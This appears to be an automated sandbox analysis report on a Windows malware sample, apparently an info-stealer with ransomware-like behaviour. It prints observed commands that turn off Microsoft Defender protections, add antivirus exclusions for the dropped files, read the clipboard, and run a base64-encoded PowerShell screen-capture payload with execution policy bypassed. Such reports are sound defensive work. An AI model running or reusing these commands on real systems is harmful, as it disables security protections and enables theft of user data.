Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: based.exe, 00000008.00000003.2318133262.00000273ED7B2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1792926439.00000273ED7B4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2380159410.00000273ED7B2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1875652146.00000273ED7AD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2368748982.00000273ED7B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2372168920.00000273ED7B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1911311417.00000273ED7B0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1820004509.00000273ED7B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: based.exe, 00000008.00000003.1792926439.00000273ED811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: based.exe, 00000008.00000002.2383767795.00000273EE538000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2581670053.00007FFDFBAA6000.00000004.00000001.01000000.0000001D.sdmp, based.exe, 00000008.00000002.2529240083.00007FFDFB742000.00000004.00000001.01000000.0000001E.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: VaTlw2kNGc.exe, 00000000.00000003.1701929834.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726830017.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1729314570.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: VaTlw2kNGc.exe, 00000001.00000002.1717549435.000001A220AD0000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1749563307.000001A052178000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378472989.00000273ED090000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? \Common Files\Desktop\DVWHKMNFNN.png	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? \Common Files\Desktop\DVWHKMNFNN.png	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? \Common Files\Desktop\KZWFNRXYKI.png	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? \Common Files\Desktop\KATAXZVCPS.pdf	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? \Common Files\Desktop\KATAXZVCPS.pdf	Jump to behavior

Source: cmd.exe

Process created: 44

System Summary

Very long command line found

Source: C:\ProgramData\Microsoft\based.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\ProgramData\Microsoft\based.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E2253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	6_2_00000202B6E2253C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E228C8 NtEnumerateValueKey,NtEnumerateValueKey,	6_2_00000202B6E228C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E22B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	6_2_00000202B6E22B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE642244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	8_2_00000273EE642244
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE642B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	8_2_00000273EE642B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE6427FC NtEnumerateKey,NtEnumerateKey,	8_2_00000273EE6427FC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE64202C NtQuerySystemInformation,StrCmpNIW,	8_2_00000273EE64202C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE6428C8 NtEnumerateValueKey,NtEnumerateValueKey,	8_2_00000273EE6428C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE64253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	8_2_00000273EE64253C

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe

Code function: 4_2_00927FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

4_2_00927FD3

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691C5C74	0_2_00007FF7691C5C74
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691BFBD8	0_2_00007FF7691BFBD8
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691A1000	0_2_00007FF7691A1000
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691C8A38	0_2_00007FF7691C8A38
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B1280	0_2_00007FF7691B1280
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B0A60	0_2_00007FF7691B0A60
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B7AAC	0_2_00007FF7691B7AAC
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691C518C	0_2_00007FF7691C518C
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B91B0	0_2_00007FF7691B91B0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691BD200	0_2_00007FF7691BD200
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B1484	0_2_00007FF7691B1484
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B0C64	0_2_00007FF7691B0C64
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B2CC4	0_2_00007FF7691B2CC4
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691A8B20	0_2_00007FF7691A8B20
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691C0B84	0_2_00007FF7691C0B84
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691C33BC	0_2_00007FF7691C33BC
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B73F4	0_2_00007FF7691B73F4
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B0E70	0_2_00007FF7691B0E70
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691C4F10	0_2_00007FF7691C4F10
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691BCD6C	0_2_00007FF7691BCD6C
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691A95FB	0_2_00007FF7691A95FB
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B5040	0_2_00007FF7691B5040
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691BD880	0_2_00007FF7691BD880
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B1074	0_2_00007FF7691B1074
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B28C0	0_2_00007FF7691B28C0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691C2F20	0_2_00007FF7691C2F20
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691BFBD8	0_2_00007FF7691BFBD8
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B1F30	0_2_00007FF7691B1F30
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691C5728	0_2_00007FF7691C5728
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691A9FCD	0_2_00007FF7691A9FCD
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691A979B	0_2_00007FF7691A979B
